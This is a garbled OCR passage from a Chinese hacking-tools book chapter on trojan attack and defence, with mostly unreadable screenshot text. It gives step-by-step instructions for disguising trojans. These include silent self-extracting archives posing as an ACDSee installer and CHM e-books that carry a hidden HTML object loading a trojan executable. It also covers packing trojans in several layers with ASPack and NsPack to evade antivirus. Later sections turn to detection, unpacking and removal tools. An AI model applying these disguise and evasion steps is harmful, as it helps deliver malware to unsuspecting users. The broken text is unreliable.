从 文件 加 寺 文 本 CD 
安稳 模式 
日 全 部 显示 内 


自 定义 自 解 讨 事件 微 标 和 图 标 3 
| 自 解 压 向 标 6) [浏览 0 | 
_“ 同 隐藏 启动 对 话 框 人 ) 从 文件 加 载 自 解压 徽标 必 


加 全 部 隐藏 00 “从 文件 加 载 自 解压 文件 图 标 上) 浏览 四) 


选中 “全 部 隐藏 ” 单 选 按钮 。 填写 “ 自 解压 文件 窗口 标 。“ 
题 " 以 及 “ 自 解压 文件 窗口 中 按钮 。 
显示 的 文本 ”。 


STEP07: 查看 注释 内 容 STEP08: 查看 生成 的 自 解压 的 压缩 文件 


| |，， 计算 帆 “地 说 磅 熏 [E:] acdsee-pro-6-32b 议 
变 翌 (F] ” 慷 加 丰 】 ”查看 fw 工具 [T) 蚂 号 (H) 
斌 绍 = 要 襄 到 庚申 新 建 袍 性 实 


从 文件 中 加 载 注释 他 ) 


手动 输入 注释 内 容 候 ) 

:下 面 的 注释 包含 自 解 压 脚 本 命令 
Sllant=l 

Ti1tle=acdsee-pro-b— debit. exe 


edsee-pro-6.3 
| 


总 局 虹 ep 人 o 一 人 B32bit. eed 
} 


是 


单 击 “ 确 定 ”按钮 。 目 解压 的 压缩 文件 。 


9.14 《HM 木马 曝光 


CHM 木马 的 制作 就 是 将 一 个 网 页 木马 添加 到 CHM 电子 书 中 ， 用 户 在 运行 该 电子 书 
时 ， 木 马 也 会 随 之 运行 。 在 制作 CHM 木马 前 需要 准备 3 个 软件 ， 即 QuickCHM 软件 、 
木马 程序 以 及 CHM 电子 书 。 准 备 好 之 后 , 便 可 通过 反 编 译 和 编译 操作 将 木马 添加 到 CHM 
二 

下 面 将 会 曝光 CHM 木马 生成 过 程 。 
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STEP01: 准备 好 3 个 必 备 软件 


交尾 丰 ” 访 辐 ([E] ”前 看 WW 工具 (T) “ 帮 防 (H) 
手 织 = [号 打 开 = 新 建立 件 壹 


证 上 监 本 壶 


里 下载 = | 


qehm26 _ mexe 


双击 CHM 文档 。 
STEP03: 查看 页 面 默 认 地 址 


我 的 电脑 | 保护 模式 : 关闭 
mk OSITStore: E 水 新 建 友 人 性 支 % 计 首 圭 基 曙 子 1 下 
_” 载 \ 新 建文 件 : ely te mn 


记录 当前 页 面 的 默 
认 地 址 。 


STEP05: 保存 网 页 代码 


蝙 齐 下) ” 格 款 ID) ”一 看 (V) ”帮助 (H) 
Ctrl+N 
Ctrl+ 已 


ight=0 


-oleobiect” codebase=” 


选择 “文件 ”>“ 男 存 为 ”菜单 命令 。 


< 第 5 章 
木马 攻防 


STEP02: 打开 CHM 电子 书 


二 ui ski] 自主 
四 -只 使 用 手册 
鱼 ] 软件 注册 
色 ] 意见 后 局 


作 更 轻松。 
QuickCHM 是 一 
外 置 语言 包 ， 吾 


计 优 秀 ， 传 贴 用 
面 等 特点 ， 交往 


克昌 由 格式 简 疗 


右 击 界 面 任 意 位 置 ， 在 弹出 的 快捷 菜单 中 选择 “ 属 


性 ”命令 。 
STEP04: 编写 网 页 代码 


前 ” 蝙 轧 (E) 格式 IO) 和 看 (V) 和 天助 (H) 


“<html» 

<head» 

[met http-equivye— - 
content=”3:url=" hbout Qui ckCHM. htm| “ 
“</head> 

“body2> 

“object width=0 height=0 

style=" display :none:” 


三 lication/x-oleobject” ceodebase= 
木马 . so 
OD]ect 


</body> 
</html> 


园 单 击 “ 确 定 " 按钮 。 在 记事 本 中 编写 网 页 代码 ， 并 将 前 面 记录 的 地 址 和 


木马 程序 名 称 渗 加 到 代码 中 。 
STEP06: 选择 保存 位 置 


本 喇 乔 充 
国 忆 "| mn HN ， 图 厅 书 子 1 下 载 ， 新 建交 过 


[ET 蜂 获 这 全 更 Fe 
= 放生 由 颜 辐 央 呈 量 去 小 
号 辐 本 噶 六 本 文档 ,bt LD Ii 。 误 地 去 本 


ass | am Ang | Ease | 


贺 填写 文件 名 ， 注意 后 
缀 为 “html 。 


加 单 击 “ 保 存 " 按钮 。 
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售 人 人 他 


re 


工具 全 攻略 


STEP07: ”启动 QuickCHM 软件 


i CuickCHM 2.6 


哀 件 | 癌 ”主题 iD) ”过 引 力 ， 廊 三 IE] 站 世 [MI) 揪 AINMI 右 税 IT) 童 看 [vi 选项 PP) 元 胸 (HI 


_ | 新 强 /M) 

3 打开 iO) 
烙 近 打 逢 (RY) 上 
关闭 


he 


镁 强 | 源 交 件 | 现 六 | 


x* 临 基 | 咬 | 


图 | 


选择 “文件 >“ 反 编译 ”菜单 命令 。 


STEP09: 查看 反 编 译 


后 的 文件 


1 | [Foma)| Eemen | Tabie | | 


F 了 | 和 了 尝 姬 上 


STEP08: 对 文件 进 


Sy QuickCHM 26 
交 件 内 ”主题 (Oi 要 引咎 钨 轧 慢 阁 式 M) 插入 IN) 
EE IOILYJELTE 鱼 || 


编译 


= | 加 | EE 
雪 稿 (和 查看 适 项 (而 的 (人 


| 


| | 三 丘 


十 


选择 电子 书 路 径 以 及 反 纺 
译 后 的 文件 存储 路 径 。 


了 healphhp - 记事 本 
广 几 ( 站 ” 蝙 山 (E] 收 式 (OQ) 得 大 人 VM | 本 上 肋 (HI 
[OPTIONS] 
i r= = a Compatibility=1. 1 
和 Compatibility=1.1 Or later 
骂 下 二 六 忻 守 Ne 
[| what ed se MTL bo 2 Default Wi ndow=Main 
电 量 汪 访 辣 的 位 置 Pl 1 60 i MTNAL Be EL Contents fi le= 和 hhe 
eno 1 人 时 a | 过 TIndex i 
ey 1 os i | |Default font= 微 软 雅 时 ,9 
i 鲜 HK FE 2 KE Language=0x804 中 文 人 简体， 中 国 ) 
日 ee B20 I HP fle LEE 
= la I 0 HTL Do 3 KB 
一 Bi 1 i HTML Do + [WI NDOWS] | 
司 | 加 二 下 去 BL I 3 ve HTML Die FE Ox20, 150, 
盐 ! 在 所 Bl i 0 se HTNL Do [| 
WD I se HTML Da 2 
蝎 正本 而 BLA I se HTML Bo PT 
1 ee HT bo 3 [FILES]| 
浊 叶 凤 机 Wi i pe HT bo 2 
电 万 党 天 而 全 直 ET HT Bm Fa 
En 束 地 辐 硬 WN] 
i 过 地 国生 下:] 
_ 丁 到 


在 所 有 文件 中 找到 后 缀 名 为 “hhp” 的 文件 。 


SRTERB Hi 


修改 .hhp 文件 代码 


查看 .hhp 文 件 的 代码 。 
SE 让 2 


本 help.hhp - 记事 于 
底 料 让” 蝙 回 上 E) 村 式 ID 查看 (W) 本 助人 HH 
LOPTIONS] 
Compatibi 1 1 ty=1. 1 i i ET 了 可 日 误 = 充 中 
Compatibility=1. 1 Or later A 二 , 
。 2 区 下 mg 302 1655 ”朗科 直 
De fault Window=Main | 本 下 看 [ | arin 村 10 ve HTML Ds i 
Contents file=help. hhe 记 是 后 贞 同 的 全 轴 berutc ir LI hm Dolado 15 jd pe HTML Do HT 
Index file=help, bh 下 a ma 
Default font= oF sp sli htm sd 1 HTML Css 1 wh 
Language= =0x804 昌文 二 中 国 ) 一 口 iauhke li0 1655 。 | 重 记 误 件 <b 
Cl bhaip hk LU3710 655 .HEIK Fils aB 
| | 图 时 了 ledip hp 2 1 m8 
[WINDOWS] re ee : 
Cr Ecard him abn ls ji a MT RAL Css ,| 
Main=” help” “help.hhe” “help.hhk” ， 1. html 4 html |，，，，，, 必 国 五 硬 下 直 Neel hem 区 HA 1655 360 se HTML De 了 本 
x20, 150, Ox104E, [400, 1, 800, 451], Ox0, Ox0, ,,,, 0 中 四 本 Nmahim SN 835 te HTML Da ?中 
ehhim Ba 0 pe HTML De 2 wh 
二 Fi ed hi SA 5 ee HTML Be 了 而 
egies Hm 390 E5560 we HTML De 4 eB 
二 时 二 和 ep he ID 0 ve HTML Do 208 
"he 区 Beech hi SA 55 0 en HTML Ba 了 而 
® Ward ht BND 1655 0 sw HTML De_ 上 
a EE 3602/10 1 上 E34 | PT 
a 
i 本 地 天 二 id 


Fommat | Emal Ta | 4 


咖 二 4 匡 :| 


改变 网 页 文件 以 及 木马 文件 位 置 


将 前 面 编写 的 网 页 文件 ( 1.html ) 和 木马 文件 ( 森 
马 .exe ) 复制 到 反 编 译 后 的 文件 夹 中 。 


在 代码 中 添加 之 前 编 写 的 网 页 文件 名 以 及 木马 名 。 
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STEP13: 重新 运行 QuickCHM 软件 STEP14: 选择 要 打开 的 文件 


cy QuickCHM 26 上 | 图 | 
交 件 月 ”主题 0) 条 3 四 篇 乡 [6 格式 IJ 插入 IN) 专 相 [T 查看 (V】 迁 项 (P】 孝 即 (H) EECEEORE GEOEOEUELTE DID 


国光 ex 六 交 | 硬 | 7 | Tonal Eema| Tw | 4 上 六 启 了 国 bm x 可 X| 国 | Fomsl | Elemen | Tabte | 4 
Fa | 9 各 i 市 i 
ET sO -|| et -| | 较 ||aBr7u| 和 后 和 枉 华 4, | | 加 二 IE 嫩 齐 志 征 行者 了 | | nr Jl 和 丘 王 虹 守 : :| 


| | ms | 


| 本 本 吕 :| 四 人 中 国志 国 " 
| 过 修改 日 加 
J images 2014/2710 L655 

[ihephhp O01 
| 
| 本 [ 

文件 各 0 后 站 
|| Mmm [rt rit 可 


区 只 下 有 E 二 


Copyright 2001-26 . 


选择 “文件 ”>“ 打 开 " 菜单 命令 。 选 定 刚才 修改 过 的 help.hhp 文件 ， 并 单 击 "打开 ” 
按钮 。 


STEP15: 返回 QuickCHM 软件 主 界面 STEP16: 编译 完成 


时 QuickCHM 2.6 - | 未 注册 ] - betp bhp i 区 QuickCHIN .6s [未 注册 | - helphhp 


[Feomat | Elemen: | Tabis | | 


和 HU| 二 丘 


选择 “文件 >“ 编译 ”菜单 命令 。 单 击 “ 否 ”按钮 。 此 时 CHM 电 子 书 木 马 已 经 制作 完 
成 ， 生 成 的 电子 书 保存 在 反 编译 文件 夹 内 。 


个 杀 CHM 木马 


使 用 360 安全 卫士 、 瑞 星 杀毒 软件 、 金 山 毒 霸 等 即 可 查 杀 并 清除 CHM 
木 蕊 。 


A 售 源 ， 包 括 对 exe.dll 等 文件 进行 压缩 。 压 缩 后 的 


可 执行 文件 依然 可 以 正确 运行 ， 运 行 前 移 在 内 存 中 将 各 种 资源 解压 绝 ， 再 调 入 资源 执行 程 
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客 过 
.工具 人 攻 了 


会 全 对 性 
序 。 加 有 元 后 的 文件 变 小 了 ， 而 且 文 件 的 运行 代码 已 经 发 生变 化 ， 从 而 很 难 被 木马 碍 杀 软 件 
扫描 出 来 并 奏 杀 ， 加 壳 后 的 木马 也 可 通过 专业 软件 得 看 是 否 加 壳 成 功 。 胶 壳 正 好 与 加 壳 相 
反 ， 指 脱 反 加 在 木马 外 面 的 郝 ， 脱 元 后 的 木马 很 容易 被 杀毒 软件 扫描 并 奏 杀 。 


5.2.{ ”使 用 MPacCk 进行 加 壳 曝 光 


ASPack 是 一 于 非常 好 的 32 位 PE 格式 可 执行 文件 压缩 软件 ， 通 利 是 将 文件 夹 进行 压 
缩 ， 用 来 缩小 其 存储 空间 ， 但 压缩 后 就 不 能 再 运行 了 ， 如 果 想 运行 必须 解压 缩 。ASPack 是 
专门 对 Win32 可 执行 程序 进行 压缩 的 工具 ， 压 缩 后 程序 能 正 党 运行， 丝毫 不 会 受到 影 啊 。 
而 且 即 使 已 经 将 ASPack 从 系统 中 删除 ， 曾 经 压缩 过 的 文件 仍 可 正 第 使 用 。 

利用 ASPack 对 木马 加 壳 进 行 的 具体 操作 步骤 如 下 。 


STEP01: 运行 ASPack STEP02: 切换 至 “打开 文件 ”选项 卡 


守 ASpack 2.28 Em | ASpack 2.28 


Win32 EwE_DLL 压 靖 墨 Win32 ExE.DLL 压 帝 器 


Black Riders ee 
2011! ] 版 本 2.28 
打开 文件 | 压 给 | 选 硕 | 关于 | 部 助 | 


[加 六 上 下 文 菜单 


| sspack 向 名 称 


切换 至 “选项 " 设置 不 创建 备份 文件 。 单 击 “ 打 开 ” 按 钮 。 
选项 卡 。 
STEP03: 选择 要 加 过 的 文件 STEP04: 开始 压缩 


查找 范围 总 ): | 国 "| 中 和 馈 他 国 7 


一 一 一 一 一 一 一 一 人 


win32 ExE.DLL 压 背 登 


Black Riders 


版 本 a011! 


自 定义 Offce 模 | 


| 文件 名 中; FR ere | 加 
芭 件 内 型 全 ): |Exeeutable File Imagek 区 EX 率 。 TIL 下 


选 定 要 加 壳 的 木马 程序 后 单 击 “ 打 开 ” 按 钮 。 单 击 “开始 ”按钮 进行 压缩 。 


108 


;= 


木马 攻防 
STEP05: ”完成 加 这 
ASPack 2.28 
版 本 2 78 
打开 文件 | 压 编 | 选 顺 | 关于 | 帮助 | 
| 文件 信息 
压 编 六 长 了 73728113 字 节 切换 至 “打开 文件 ”选项 卡 ， 可 以 看 到 木马 程序 压 


压 编 后 长 度 52 224 字 节 


缩 衣 和 压缩 后 的 文件 大 小 。 


3.2.2 ”使 用 “北斗 程序 压缩 ”对 木马 服务 端 进行 多 次 加 过 


虽然 为 木马 加 过 却 之 后 可 以 喉 过 杀毒 软件 ， 但 仍 有 一 些 特别 强 的 杀毒 软件 可 以 查 杀 只 
加 过 一 次 壳 的 木马 。 北 斗 程序 压缩 (Nspack) 是 一 款 拥 有 目 主 知识 产权 的 压缩 软件 ， 是 一 
个 exe/dll/ocx/scr 等 32 位 、64 位 可 运行 文件 的 压强 器 。 压 缩 后 的 程序 在 网 络 上 可 减少 程序 
的 加 载 和 下 载 时 间 。 

使 用 “北斗 程序 压缩 ”给 木马 服务 问 进 行 多 次 加 壳 的 具体 操作 步骤 如 下 。 


STEP01: 运行 “北斗 程序 压缩 ”软件 STEP02: 切换 至 “文件 压缩 ”选项 卡 


文件 加 选项 名 ) 帮助 加 文件 外 选项 区 ) 帮助 吕 

悦 文 件 苇 编 | 前 目录 压 编 | 局 本 于 过 硕 | 站 关于 | (0 文件 压 病 | 六 目录 压 嫁 | 局 村 法 硕 | 总 关于 | 
呈 甘 绚 党 源 区 襄 国 重 定 世 节 反 | 和 由 三 编程 序 .. . 

到 在 压缩 前 备份 程序 厂 保留 额外 教 所 

[7 强制 压 帝 到 遇 出 保存 设置 

原 趟 焉 共享 节 厂 伍 用 Shell 右键 扩展 

| 加 频 后 自动 运行 厂 更 新 des stak 名 分 


区 全 用 全 mdess DIL 加 载 于 [ 最 大 程度 压 山 反 iage : 垃 支 持 ) 
三 悍 留 原 交 件 的 大小 厂 妆容 性 压 编 


国 切换 至 “配置 选项 ” 国 勾 选 “处 理 共享 节 " 等” 单 击 “ 打 开 ” 按 钮 。 
选项 卡 。 重要 参数 。 
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客 过 
.区 -工具 改 了 


仿 公 公 志 
STEP03: 选择 可 执行 文件 STEP04: 开始 压缩 


| 月 BED, b CDSeeJProw .212 "| 二 川 站 ACO ee Fro rd ?ri | 变 件 和 计 项 后) 帮助 吕 ) 
吧 文件 压 纺 | 前 目录 压 编 | 局 配置 先 硕 | 中 关于 | 


== 要 后 路 由 本 。 aedsee-preo- 电 :3 
上 是 信 宗 击 --== bit,ewe 


4 昌 ] 二 污 3057 眉 ) 压 决 军 : [-1.79] 
件 压 鲁 腕 展 
: 醒 LBDLETPGEK 


ml Zk 


训 翌 各 [NE 闲 驴 ,ewe 
打开 如 ) 


选 定 可 执行 文件 后 单 击 “ 打 开 ” 按 钮 。 单 击 “压缩 ”按钮 ， 对 木马 程序 进行 压缩 。 


1) 当 有 大 量 的 木马 程序 需要 进行 压缩 加 壳 时 ， 可 以 使 用 “北斗 程序 压缩” 
《全 ”的 “目录 ”压缩 功能 ， 进 行 批量 压缩 加 过， 
2) 经 过 “北斗 程序 压缩 ”加 胸 的 木马 程序 ， 可 以 使 用 ASPack 等 加 区 工具 


提示 
“进行 再 次 加 壳 ， 这 样 就 有 了 两 层 壳 的 保护 . 


5.2.3 ”使 用 PE-$can 检测 木马 是 否 加 过 过 


PE-Scan 是 一 个 类 似 FileInfo 和 PE iDentifier 的 工具 ， 可 以 检测 出 加 过 时 使 用 了 哪 种 
技术 ， 给 脱 壳 /汉化 /破解 带 来 了 极 大 的 便利 。PE-Scan 还 可 检测 出 一 些 壳 的 入 口 点 (OEP)， 
方便 手动 脱 壳 ， 对 加 过 软件 的 识别 能 力 完全 超过 FileInfo 和 PE iDentifier， 能 识别 出 绝 大 
多 数 壳 的 类 型 。 另 外 ， 它 还 具备 局 级 扫 拉 器， 其 备 重 建 脱 元 后 文件 的 资源 表 功 能 。 

基体 的 使 用 步骤 如 下 。 


STEP01: 运行 PE-Scan STEP02: 设置 相关 选项 


|Pe-scan 3.31 一 | pe-scan 3,31 


| 


单 击 “选项 ”按钮 。 根据 提示 信息 勾 选 。 区 


单 击 “关闭 ”按钮 。 
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STEP03: 返回 主 界 面 STEP04: 选择 要 分 析 的 文件 


pe-scan : Du\ 木 马 .exe 


查找 范围 0): | | ACDSee. Pro. 68.2.212. Incl. Ke = 条 车 CF 图 > 
[和 


| 名 称 颇 改 日 其 


[ J 
二 : : 二 = 
: | = 作息 | EE 型 号 mr Keygen a2014/28 1643 | 
和 十 口 去 1h 让 准 刑 碘 acdsee-pro-6-32bit.exe 2013/3/7 018 | 
‘法 识别 的 加 壳 / 加 密 类 型 | 本 Eee 2014/2/11 .52 


体 未 马 1.exe 2014/2/9 16:54 = 
电 | kb 


有 


[ee 文件 名 名: ”不 引 exe |_#fo) | 
| 这 页 | J 克 件 党 型 和): |PE 鹤 件 [exwefseriepl/ lj/ocx/sys] ™ SF 动 消 = 


一 一 


单 击 “ 打 开 ” 按 钮 。 选中 要 分 析 的 文件 。 单 击 “打开 ”按钮 。 
STEP05: 查看 文件 加 壳 信 STEP06: 查看 入 口 点 、 偏 移 量 等 信息 


了 


2 Da 森马.exe | = || pe-scan : DN 森马 .exe 


= 信息 En ww | 仿 列 : 


”可 能 的 加 壳 类 型 : : a 


http-/m ww . as 


选项 


文件 经 过 “aspack 2.28” 加 壳 。 单 击 “入 口 点 ”按钮 后 查 4 单 击 “高 级 扫 
看 入 口 点 、 侦 移 量 等 信息 。 摘 - ， 
STEP07: 查看 最 接近 的 匹配 信息 STEP08: 查看 最 长 的 链 等 信息 


三 人 | 限于 于 征 : 
Mr 吾 j 壮 担 “， 入 D 点 || 区 怖 ] 
aspack 2,.11 :: 33.33% 下 二 征 二 pe-bunde 2.01.2-2.42 :: D003h 4 备 特 征 :: 


neolite 2,00 [dl/ocx] :: 27.27% rr sl ; pe-shrink 0. 29b :: O002h = = 
pe-bundle 2.01.2-2.42 :: 25.93% 入 由 总 | 区 pe-shrink 0 45b :: 0002h wes 1 


Faclmaster 1.0/1.6 :: 25,00% peshrink 0.7T0b :: O002h 
| IEe-shyink 0. Tib :: 0002h 


upx U. 


i 0 75b : ，21. 88% = 
完成 . =) 二 二 


[LITTITITLITIIIIIIIIIIIIIILILIIIIIIILIIILLLLL | 


单 击 “ 局 发 特征 下 的 “入 口 点 ”按钮 ， 查 看 最 接 ” 单 击 " 链 特征 "下 的 “入 口 点 ”按钮 ， 查 看 最 长 的 
近 的 匹配 信息 。 链 等 信息 。 


5.2.4 使 用 UnASpPack 进行 脱 过 


在 碍 出 木马 的 加 序 程 序 之 后 ， 就 需要 找到 原 加 训 程 序 进 行 腾 序 ， 上 述 木 马 使 用 
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客 过 
PE IRNm 


全 人 人 他 
ASPack 进行 加 壳 ,， 所 以 需要 使 用 ASPack 的 脱 帝 工具 UnASPack 进行 脱 过 。 具 体 的 操作 
步骤 如 下 。 
STEP01: 启动 UnASPack STEP02: 打开 UnASPack 界面 


司 | 虹 诉 访问 的 位 置 

辐 夯 UnAspack2,1 汉 
一 | PPTV 视 频 化 版 .exe 
图 视频 


这 个 旺 一 和 合 Faek 2.1 脐 壳 程序 ，“ 会 天 渤 事 给 局 : ap 
a 天 定之 ol 


下 载 UnASPack 并 解 讨 到 本 地 计算 机 ， 双 击 UnAS ” 单 击 “文件 ”按钮 。 
Pack 快 捷 图 标 。 


STEP03: 选择 要 脱 壳 的 文件 STEP04: 开始 脱 壳 


获 ASPack 2.1 脱 壳 天 使 之 现 汉 化 版 


| 你 要 脱 的 文件 : 陪 壳 | 
本 r | | |E: weiwei_3894 (1). exe 


elsave.exe UnAspack2,1 没 | wenwel 3894 
这 个 是 一 了 BPFack 站 1 脱 膏 程序 ， er i 
BT: 天 使 之 其 QQ: 1591901 


选中 要 脱 壳 的 文件 后 单 击 “ 打 开 ” 按 钮 。 查看 生成 的 文件 路 径 。 单 击 “ 脱 过 ”按钮 
即 可 成 功 脱 过 。 


使 用 UnASPack 进行 脱 这 时 要 注意 ，UnASPack 的 版 本 要 与 加 这 时 的 
ASPack 一 致 ， 才 能 够 成 功 为 木马 脱 壳 。 


.3 ”木马 清除 工具 


如 果 不 了 解 发 现 的 木马 病毒 ， 要 想 确 定 木马 的 名 称 、 入 侵 问 口 、 隐 藏 位 置 和 清除 方法 
等 都 非常 困难 ， 这 时 惑 需要 使 用 木马 清除 软件 来 清除 木马 。 


9.34.{ 用 木马 清除 专家 清除 木马 


木马 清除 专家 2014 是 一 于 专业 防 杂 木 号 软件 , 可 以 彻 压 合 杀 各 种 流行 的 QQ 盗 写 木马 、 
网 洲 盗 吉木 马 、 黑 客 后 门 等 上 万 种 木马 间谍 程序 。 有 具体 的 操作 步骤 如 下 。 
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STEP01: ”启动 木马 清除 专家 2014 


略 ”系统 是 控 


EF 


ET EE 


打开 “木马 清除 专家 2014” 主 界面 ， 并 单 击 页 面 左 
侧 的 “扫描 内 存 ” 按 钮 。 


STEP03: ”扫描 硬盘 


所 本 轧 浊 四 看 训 2014 青 壮 本 双重 其 罗 乍 


口 此 用 所 克 加 沼 忻 引 罩 档 各 口 档 面 定 感 后 筷 动 甘 艇 


单 击 “ 扫 描 硬 盘 ”， 包 括 “快速 扫 描 "“ 全 面 扫描 "、 
“ 自 定义 扫描 ”三 种 扫描 方式 , 根据 需要 单 击 其 中 一 
个 按钮。 


STEP05: 查看 系统 信息 


i 
jf 寿 肯 用 情 强 
| 
< 时 ee 
置 下 和 内容 Va] 


TE | 
内 育 峙 程 井 0 地 瘟 可 用 空间 | 


不过 运行 时 闻 | 9 村 呆 寻 


单 击 “ 系 统 信息 ” ” 国 查看 CPU 占用 率 以 及 
按钮 。 内 存 使 用 情况 等 信息 。 


< 第 5 章 
木马 攻防 


STEP02: 查看 扫描 结果 


各 末 马 青 除 专家 z014 专业 森马 查 茶 软 件 


扫描 完成 后 可 直接 在 页 面 中 碍 看 扫描 结果 


STEP04: 开始 要 描 


电 ”木马 清除 专家 2014 也 交 
DR 国 本 重担 扫 介 新 
扫描 拒 击 。。 已 j3 措 广 件 [去 !] 增 流 引 蓝 从 析 厂 5] 慨 现 万 和 


必 - 是 item 下 上 FeS 民 省 A 和 rite 民 s 下 全 站 而。 本 Tri se Cers 人 
EE 


和 
要 措 肉 存 


开始 扫描 后 可 以 随时 单 击 “停止 扫描 ”按钮 终止 


扫描 。 


单 击 “ 进 程 管 


理 ” 按 钮 。 rp my " 按钮 。 
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工具 全 攻略 


ST IF 一 一 


pT 
STEP07: ”查看 启动 项 目 


吗 日 如 RM 
顺 目 各 说 和 Guiwira 芭 司 襄 入 ;556 = 
; i 十 ee 


程 床 科 填 


Ereg es Fliiby ei Ni tr Tiar as ear til se 
TE ragri Friouridpybst = Sourek B Davirsy ishtrup & 
| 各 Pa a PL ED i i i TF ey, wi oir 
Slr hit 

EPragris Poulet\das dns dna. 1 de hileFruy. a 
er. ar 

[oa 三 二 量 ieE 


上 机 让 RE 二 


有 二 号 T 3, 二 .3 1 


查看 启动 项 目 详 细 信息 , 发 现 可 


单 击 “ 启 


动 管理 ” 按 ” 疑 木 马 可 单 击 “删除 项 目 ” 按 钮 删 
除 该 木马 。 


绑 定 网 关 IP 与 网 关 MAC 


钮 。 
STEPO9: 


ee 


网 半球 且 网 其 的 EE 
本 半球 


网 项 
人 


口 开 总 247 重 商 时 于 而 癌 


素 届 卦 址 恼 息 
可 机 芋 [LL 


EE MT 


国 单 击 “ARP 国 输入 IP 地 址 和 MAC 地 址 并 勾 选 
绑 定 " 按钮。 “开启 ARP 单 向 绑 定 功能 " 复 选 框 。 


STEP11: 查看 网 络 状态 


志 壮 马 重演 软 俐 


Tt 
旱 硬 二, FT 人 HH 
bE 
[Ee 
aT 1S 
bm Ws Fy MH 
1 Bf 
I Los HD, EE 


国 单 击 “ 网 络 旦 、 端 口 、 远 程 地 址 、 


状态 ” 按钮。 


状态 等 信息 。 
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单 击 “ 修 
复 系统 "按钮 。 链接 对 系统 进行 修复 


| 回 恰 证 1 主 再 和 有 认 再 
回 恒 调 到 崩 盏 3 理 
回收 冰 IE 加 示人 标 且 
回 蝇 霄 IE 可 单 三 下 制 
回 幢 而 1 各 让 中 可 
回 怪 蛋 荆 十 耐量 本 
回 私 中 Meal 表 史 目 
口 层 册 Piaseis 145 关联 


加 机 让 病毒 十 丰 有 二 本 7T 王 杆 ep 


国 单 击 “ 修 复 
IE” 按 钮 。 


STEP12: 删 F 


勾 选 需要 修复 的 选项 并 单 击 
“开始 修复 ”按钮 。 


余 顽 固 木 马 


国 单 击 " 辅 国 单 击 " 浏 览 添加 文件 ”按钮 ， 添 
助 工具 ” 按 。 加 文件 ; 单 击 * 开 始 粉碎 ， 按钮 ， 册 
钮 。 除 无 法 删除 的 顽固 木马 。 


STEP13: 多 种 辅助 工具 STEP14: 查看 监控 日 志 


大 业 丰 马 香 时 星 陡 


品系 辣 监 控 上 日 志 。 [50 定 9 日 本 


下 逢 什 芜 受 理 序 


Er 


注册 者 摘 妥 回 


留 根据 功能 有 针对 性 地 使 用 国 单 击 "监控 ” 国 定期 查看 监控 日 志 ， 查 找 黑 


团 单 击 "其 化 辅 上 
各 种 工具 。 日 志 ” 按钮 。 


助 工具 ”按钮 。 


5.3.2 在 “WindoWs 进程 管理 器 ”中 


映像 名 称 。 ”用 户 名 CPU ”内 存 (.， 撕 述 


ra 程 360rp. exe Adanin ”00 4 600 天 360 共 毒 
官 理 进程 ee 
certd nps3. ™ 984 KEK certreg 
RE | i 
所 请 进程 是 指 系 乡 中 应 用 程序 的 运 云 行 实例 ， 是 应 Fe exe a 2 3 i 1 
用 程序 的 一 次 动态 执行 ， 是 操作 系统 当前 运行 的 执行 Se | | 
lexplore. exe Admin... 33, 016 K TInterne... 
程序 。 通 总 第 按 ( Ctrl+Aljlt+Delete ) 组 合 键 ， We 局 ia Exe Adnin. ge T 272 | Iatearne 


lexplore.exe Admin... 40,544 KEK TInterne... 


动 任务 管理 器 9 即 可 打开 A Ve Pr 任务 管 理 颈 有 窗 be exe SYSTEM 304 kK Irissve ~ 
- 可 显示 所 有 用 户 的 进程 @) [sR 
口 ， 在 “进程 ”选项 卡 中 可 对 进程 进行 i 
如 右 图 所 示 。 
要 想 更 好 、 更 全 面 地 对 进程 进行 管理 ， 还 需要 借助 于 “Windows 进程 管理 器 ”软件 的 
功能 才能 实现 ， 具 体 的 操作 步骤 如 下 。 


| 进程 数 : 64 CPU 使 用 率 : 5% 物理 内 存 : 5496 


STEP01: 启动 “Windows 进程 管理 器 ” 


向 光 畔 颖 厚 陪 各 蕊 门 开 届 目 让 过 和 口 ] 益 号 车 裔 


起 避 尼 汉 昌 四 委 业 轴 。 = 


必用 要 起 二 


E CE ‘himdsen tri Nl srs 
re ma 证 
[TT 
是 :rar Filev inirg lee 
re ilel\in A "Be 


Erag a Pileu\V Wom hd 
[a 


[TT 
Er pe he Pilet bri 


诺 古 酮 : 虹 。 CEV: TE 骨 和 有 3 7 下 和 要。 用 usa 许 办 全 时 到 TH 209g509 = 二 全 必 疡 志 3200802 we 乔 Eza.ecoa | 赴 布 :9T 1 号 和 和 夯 。。 Wray 诗 轩 管理 站 57 FS ”指证 原 病 本 TM 


解压 缩 下载 的 “Windows 进 程 管理 器 ”软件 ,双击 ”选择 列表 中 的 其 中 一 个 进程 选项 之 后 ， 单 击 "描述 ” 
“PrcMgr.exe” 启动 程序 图 标 ， 即 可 打开 “Windows 按钮 ， 即 可 对 其 相关 信息 进行 查看 。 

进程 管理 器 ”窗口 ， 查 看 系统 当前 正在 运行 的 所 有 

进程 。 
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有 


工具 全 攻略 


ST IF 一 一 


全 人 人 他 
STEP03: 查看 进程 模块 


看 动 澳际 类 附 二 本 忆 | 开 相 向 直 二 行 ”加 雷 品 置 甬 


ruvbas 二 # recsen nN 国 点 行 十 情 塌 


Prite Fe Perec 


STEP04: 操作 进程 选项 


国 imgsas 加 三代 至 畏 
汪 寺 和 Lj 启程 凯 ”民生 1 和 晤 病 十 届 


EL 本 


重出 四 基 才 防 再 得 【| 开本 和 站 志和 


mun ands 出生 天 当 1 十 三 趟 


| Eile 
| 和 

| em 1 

| 三 CTT 
Dea sa 

| arican 有 
| 曾 hls Pre 
EE 和 遇 记 让 剖面 向 
ys rs 

| seb. aa 
i 
"Ree rt 
遍 Luis im 
| edi i 

| ment 
| 
[sb 

| 厨 mbna sr Er 
| 

| tl i aa 

| bn .ih 
eb 和 


| et 


于 于 二 

TT SETEE 
SITE 

LDL SEENILE 
Es 

于 于 而 

Er SINITE 
SIE 

TT FMT 
FEE 

EL. STEENICE 
BEA SEENWILT 


os Trt EE TE i LE TE 


EE le. Shi | 
id hal 燥 ] 
Ti er EE ad 1 
Rid i ret eh HL 
和 
| 
Mimsanier ut anLF dl 
Ui 10 起 1 
i 避 上 
生机 站 re ETETELESEEAAEAATEIY 本 5 
TT 是 1 
Tid rt eT 
i 
Te ee | 
dr ML 
rT 
TE 1 
dh 是 
rr Le et 
和 量 1 
i 
ii dr rt em 二 
is tl 1 
Midi 可 
Wid UT ls OL 
i TT 1 
1 
Ri dn i Erte rn 吉 由 
i de rr 起 
res Flauvhinirg lira dl 


单 击 “ 模 块 ”按钮 ， 即 可 查看 该 进程 的 进程 模块 。 


STEP05: 查看 属性 


"SmMmss,exe 属性 


文件 类 型: 


应 用 程序 【 sxe] 


